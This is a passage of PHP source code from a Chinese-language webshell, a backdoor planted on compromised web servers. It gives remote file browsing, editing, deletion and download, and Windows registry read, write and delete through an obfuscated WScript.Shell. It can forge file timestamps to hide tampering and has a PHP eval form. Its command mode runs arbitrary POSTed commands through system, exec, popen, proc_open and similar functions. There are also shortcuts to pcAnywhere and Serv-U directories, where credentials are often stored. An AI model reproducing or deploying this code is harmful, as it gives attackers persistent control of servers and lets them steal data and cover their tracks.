elseif(($regread) AND !empty($_POST['readregname'])) {
$shell= &new COM('WSc'.'rip'.'t.Sh'.'ell');
var_dump(@$shell->RegRead($_POST['readregname']));
}
// 寫入注冊表
elseif(($regwrite) AND !empty($_POST['writeregname']) AND !empty($_POST['regtype']) AND !empty($_POST['regval'])) {
$shell= &new COM('W'.'Scr'.'ipt.S'.'hell');
$a = @$shell->RegWrite($_POST['writeregname'], $_POST['regval'], $_POST['regtype']);
echo ($a=='0') ? "寫入注冊表健值成功!" : "寫入 ".$_POST['regname'].", ".$_POST['regval'].", ".$_POST['regtype']." 失敗!";
}
// 刪除注冊表
elseif(($regdelete) AND !empty($_POST['delregname'])) {
$shell= &new COM('WS'.'cri'.'pt.S'.'he'.'ll');
$a = @$shell->RegDelete($_POST['delregname']);
echo ($a=='0') ? "刪除注冊表健值成功!" : "刪除 ".$_POST['delregname']." 失敗!";
}
else {
echo "$notice";
echo "<a href="\" href="\""?dir=C:/Program%20Files/\">Program</a> | <a href="\" href="\""?dir=C:/Documents%20and%20Settings/All%20Users/Application%20Data/Symantec/pcAnywhere\">pcAnywhere</a> | <a href="\" href="\""?dir=C:/Documents%20and%20Settings/All%20Users/「開始」菜單/程序\">開始程序</a> | <a href="\" href="\""?dir=C:/Documents%20and%20Settings/All%20Users\">AllUsers</a> | <a href="\" href="\""?dir=C:/Program Files/RhinoSoft.com/Serv-U\">Serv-U</a> | ";
for ($i=66;$i<=90;$i++){$drive= chr($i).':';
if (is_dir($drive."/")){$vol=shelL("vol $drive");if(empty($vol))$vol=$drive;echo " <a title=\"$drive/\" href="\" href="\""?dir=$drive/\">$drive\\</a>";}
}
}
echo "</b></p>\n";
/*===================== 執行操作 結束 =====================*/
if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) {
$tb->tableheader();
?>
<tr bgcolor="#cccccc">
<td align="center" nowrap width="27%"><b>文件</b></td>
<td align="center" nowrap width="16%"><b>創建日期</b></td>
<td align="center" nowrap width="16%"><b>最後修改</b></td>
<td align="center" nowrap width="11%"><b>大小</b></td>
<td align="center" nowrap width="6%"><b>屬性</b></td>
<td align="center" nowrap width="24%"><b>操作</b></td>
</tr>
<FORM action="" method="POST">
<?php
// 目錄列表
$dirs=@opendir($dir);
$dir_i = '0';
while ($file=@readdir($dirs)) {
$filepath="$dir/$file";
$a=@is_dir($filepath);
if($a=="1"){
if($file!=".." && $file!=".") {
$ctime=@date("Y-m-d H:i:s",@filectime($filepath));
$mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
$dirperm=substr(base_convert(fileperms($filepath),10,8),-4);
echo "<tr class=".getrowbg().">\n";
echo " <td style="\" style="\""padding-left: 5px;\"><INPUT type=checkbox value=$file name=dl[]> [<a href="\" href="\""?dir=".urlencode($dir)."/".urlencode($file)."\"><font color=\"#006699\">$file</font></a>]</td>\n";
echo " <td align=\"center\" nowrap class=\"smlfont\">$ctime</td>\n";
echo " <td align=\"center\" nowrap class=\"smlfont\">$mtime</td>\n";
echo " <td align=\"center\" nowrap class=\"smlfont\"><a href="\" href="\""?action=search&dir=".$filepath."\">Search</a></td>\n";
echo " <td align=\"center\" nowrap class=\"smlfont\"><a href="\" href="\""?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$dirperm</a></td>\n";
echo " <td align=\"center\" nowrap>| <a href="\" href="\""#\" onclick=\"really('".urlencode($dir)."','".urlencode($file)."','你確定要刪除 $file 目錄嗎? \\n\\n如果該目錄非空,此次操作將會刪除該目錄下的所有文件!','1')\">刪除</a> | <a href="\" href="\""?action=rename&dir=".urlencode($dir)."&fname=".urlencode($file)."\">改名</a> |</td>\n";
echo "</tr>\n";
$dir_i++;
} else {
if($file=="..") {
echo "<tr class=".getrowbg().">\n";
echo " <td nowrap colspan=\"6\" style="\" style="\""padding-left: 5px;\"><a href="\" href="\""?dir=".urlencode($dir)."/".urlencode($file)."\">返回上級目錄</a></td>\n";
echo "</tr>\n";
}
}
}
}// while
@closedir($dirs);
?>
<tr bgcolor="#cccccc">
<td colspan="6" height="5"></td>
</tr>
<?
// 文件列表
$dirs=@opendir($dir);
$file_i = '0';
while ($file=@readdir($dirs)) {
$filepath="$dir/$file";
$a=@is_dir($filepath);
if($a=="0"){
$size=@filesize($filepath);
$size=$size/1024 ;
$size= @number_format($size, 3);
if (@filectime($filepath) == @filemtime($filepath)) {
$ctime=@date("Y-m-d H:i:s",@filectime($filepath));
$mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
} else {
$ctime="<span class=\"redfont\">".@date("Y-m-d H:i:s",@filectime($filepath))."</span>";
$mtime="<span class=\"redfont\">".@date("Y-m-d H:i:s",@filemtime($filepath))."</span>";
}
@$fileperm=substr(base_convert(@fileperms($filepath),10,8),-4);
echo "<tr class=".getrowbg().">\n";
echo " <td style="\" style="\""padding-left: 5px;\">";
echo "<INPUT type=checkbox value=$file name=dl[]>";
echo "<a href="\" href="\""$filepath\" target=\"_blank\">$file</a></td>\n";
echo " <td align=\"center\" nowrap class=\"smlfont\">$ctime</td>\n";
echo " <td align=\"center\" nowrap class=\"smlfont\">$mtime</td>\n";
echo " <td align=\"right\" nowrap class=\"smlfont\"><span class=\"redfont\">$size</span> KB</td>\n";
echo " <td align=\"center\" nowrap class=\"smlfont\"><a href="\" href="\""?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$fileperm</a></td>\n";
echo " <td align=\"center\" nowrap><a href="\" href="\""?downfile=".urlencode($filepath)."\">下載</a> | <a href="\" href="\""?action=editfile&dir=".urlencode($dir)."&editfile=".urlencode($file)."\">編輯</a> | <a href="\" href="\""#\" onclick=\"really('".urlencode($dir)."','".urlencode($filepath)."','你確定要刪除 $file 文件嗎?','2')\">刪除</a> | <a href="\" href="\""?action=rename&dir=".urlencode($dir)."&fname=".urlencode($filepath)."\">改名</a> | <a href="\" href="\""?action=newtime&dir=".urlencode($dir)."&file=".urlencode($filepath)."\">時間</a></td>\n";
echo "</tr>\n";
$file_i++;
}
}// while
@closedir($dirs);
if(get_cfg_var('safemode'))$z = "<a href="\" href="\""#\" title=\"使用說明\" onclick=\"alert('Php為安全模式盡量少打包內容以免腳本超時\\n\\n填寫文件名則把文件保存在本地方便操作,不填則直接下載。')\">(?)</a>";
else $z = "<a href="\" href="\""#\" title=\"使用說明\" onclick=\"alert('Php運行非安全模式,打包大件請等啊等啊等啊等\\n\\n填寫文件名則把文件保存在本地方便操作,不填則直接下載。')\">(?)</a>";
$tb->tdbody('<table width="100%" border="0" cellpadding="2" cellspacing="0" align="center"><tr><td>'.$tb->makeinput('chkall','on','onclick="CheckAll(this.form)"','checkbox','30','').' 本地文件:'.$tb->makeinput('localfile','','','text','15').''.$tb->makeinput('downrar','選中打包下載或本地保存','','submit').' '.$z.'</td><td align="right">'.$dir_i.' 個目錄 / '.$file_i.' 個文件</td></tr></table>','center',getrowbg(),'','','6');
echo "</FORM>\n";
echo "</table>\n";
}// end dir
elseif ($_GET['action'] == "editfile") {
if(empty($newfile)) {
$filename="$dir/$editfile";
$fp=@fopen($filename,"r");
$contents=@fread($fp, filesize($filename));
@fclose($fp);
$contents=htmlspecialchars($contents);
}else{
$editfile=$newfile;
$filename = "$dir/$editfile";
}
$action = "?dir=".urlencode($dir)."&editfile=".$editfile;
$tb->tableheader();
$tb->formheader($action,'新建/編輯文件');
$tb->tdbody('當前文件: '.$tb->makeinput('editfilename',$filename).' 輸入新文件名則建立新文件 Php代碼加密: <input type="checkbox" name="change" value="yes" onclick="javascript:alert(\'這個功能只可以用來加密或是壓縮完整的php代碼。\\n\\n非php代碼或不完整php代碼或不支持gzinflate函數請不要使用!\')"> ');
$tb->tdbody($tb->maketextarea('filecontent',$contents));
$tb->makehidden('do','doeditfile');
$tb->formfooter('1','30');
}//end editfile
elseif ($_GET['action'] == "rename") {
$nowfile = (isset($_POST['newname'])) ? $_POST['newname'] : basename($_GET['fname']);
$action = "?dir=".urlencode($dir)."&fname=".urlencode($fname);
$tb->tableheader();
$tb->formheader($action,'修改文件名');
$tb->makehidden('oldname',$dir."/".$nowfile);
$tb->makehidden('dir',$dir);
$tb->tdbody('當前文件名: '.basename($nowfile));
$tb->tdbody('改名為: '.$tb->makeinput('newname'));
$tb->makehidden('do','rename');
$tb->formfooter('1','30');
}//end rename
elseif ($_GET['action'] == "eval") {
$action = "?dir=".urlencode($dir)."";
$tb->tableheader();
$tb->formheader(''.$action.' "target="_blank' ,'執行php腳本');
$tb->tdbody($tb->maketextarea('phpcode',$contents));
$tb->formfooter('1','30');
}
elseif ($_GET['action'] == "fileperm") {
$action = "?dir=".urlencode($dir)."&file=".$file;
$tb->tableheader();
$tb->formheader($action,'修改文件屬性');
$tb->tdbody('修改 '.$file.' 的屬性為: '.$tb->makeinput('fileperm',substr(base_convert(fileperms($dir.'/'.$file),10,8),-4)));
$tb->makehidden('file',$file);
$tb->makehidden('dir',urlencode($dir));
$tb->makehidden('do','editfileperm');
$tb->formfooter('1','30');
}//end fileperm
elseif ($_GET['action'] == "newtime") {
$action = "?dir=".urlencode($dir);
$cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
$tb->tableheader();
$tb->formheader($action,'克隆文件最後修改時間');
$tb->tdbody("修改文件: ".$tb->makeinput('curfile',$file,'readonly')." → 目標文件: ".$tb->makeinput('tarfile','需填完整路徑及文件名'),'center','2','30');
$tb->makehidden('do','domodtime');
$tb->formfooter('','30');
$tb->formheader($action,'自定義文件最後修改時間');
$tb->tdbody('<br><ul><li>有效的時間戳典型范圍是從格林威治時間 1901 年 12 月 13 日 星期五 20:45:54 到 2038年 1 月 19 日 星期二 03:14:07<br>(該日期根據 32 位有符號整數的最小值和最大值而來)</li><li>說明: 日取 01 到 30 之間, 時取 0 到 24 之間, 分和秒取 0 到 60 之間!</li></ul>','left');
$tb->tdbody('當前文件名: '.$file);
$tb->makehidden('curfile',$file);
$tb->tdbody('修改為: '.$tb->makeinput('year','1984','','text','4').' 年 '.$tb->makeselect(array('name'=>'month','option'=>$cachemonth,'selected'=>'October')).' 月 '.$tb->makeinput('data','18','','text','2').' 日 '.$tb->makeinput('hour','20','','text','2').' 時 '.$tb->makeinput('minute','00','','text','2').' 分 '.$tb->makeinput('second','00','','text','2').' 秒','center','2','30');
$tb->makehidden('do','modmytime');
$tb->formfooter('1','30');
}//end newtime
elseif ($_GET['action'] == "shell") {
$action = "??action=shell&dir=".urlencode($dir);
$tb->tableheader();
$tb->tdheader('WebShell Mode');
if (substr(PHP_OS, 0, 3) == 'WIN') {
$program = isset($_POST['program']) ? $_POST['program'] : "c:\winnt\system32\cmd.exe";
$prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname."/log.txt";
echo "<form action=\"?action=shell&dir=".urlencode($dir)."\" method=\"POST\">\n";
$tb->tdbody('無回顯運行程序 → 文件: '.$tb->makeinput('program',$program).' 參數: '.$tb->makeinput('prog',$prog,'','text','40').' '.$tb->makeinput('','Run','','submit'),'center','2','35');
$tb->makehidden('do','programrun');
echo "</form>\n";
}
echo "<form action=\"?action=shell&dir=".urlencode($dir)."\" method=\"POST\">\n";
if(isset($_POST['cmd'])) $cmd = $_POST['cmd'];
$tb->tdbody('提示:如果輸出結果不完全,建議把輸出結果寫入文件.這樣可以得到全部內容. ');
$tb->tdbody('proc_open函數假設不是默認的winnt系統請自行設置使用,自行修改記得寫退出,否則會在主機上留下一個未結束的進程.');
$tb->tdbody('proc_open函數要使用的cmd程序的位置:'.$tb->makeinput('cmd',$cmd,'','text','30').'(要是是linux系統還是大大們自己修改吧)');
$execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','wscript'=>'Wscript.Shell','proc_open'=>'proc_open') : array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','proc_open'=>'proc_open');
$tb->tdbody('選擇執行函數: '.$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$execfunc)).' 輸入命令: '.$tb->makeinput('command',$_POST['command'],'','text','60').' '.$tb->makeinput('','Run','','submit'));
?>
<tr class="secondalt">
<td align="center"><textarea name="textarea" cols="100" rows="25" readonly><?php
if (!empty($_POST['command'])) {
if ($execfunc=="system") {
system($_POST['command']);
} elseif ($execfunc=="passthru") {
passthru($_POST['command']);
} elseif ($execfunc=="exec") {
$result = exec($_POST['command']);
echo $result;
} elseif ($execfunc=="shell_exec") {
$result=shell_exec($_POST['command']);
echo $result;
} elseif ($execfunc=="popen") {
$pp = popen($_POST['command'], 'r');
$read = fread($pp, 2096);
echo $read;
pclose($pp);
} elseif ($execfunc=="wscript") {
$wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll') or die("PHP Create COM WSHSHELL failed");
$exec = $wsh->exec ("cm"."d.e"."xe /c ".$_POST['command']."");
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
} elseif($execfunc=="proc_open"){
$descriptorspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("pipe", "w")
);
$process = proc_open("".$_POST['cmd']."", $descriptorspec, $pipes);
if (is_resource($process)) {
// 寫命令
fwrite($pipes[0], "".$_POST['command']."\r\n");
fwrite($pipes[0], "exit\r\n");
fclose($pipes[0]);
// 讀取輸出
while (!feof($pipes[1])) {
echo fgets($pipes[1], 1024);
}
fclose($pipes[1]);
while (!feof($pipes[2])) {
echo fgets($pipes[2], 1024);
}
fclose($pipes[2]);
proc_close($process);
}
} else {
system($_POST['command']);
}
}
?>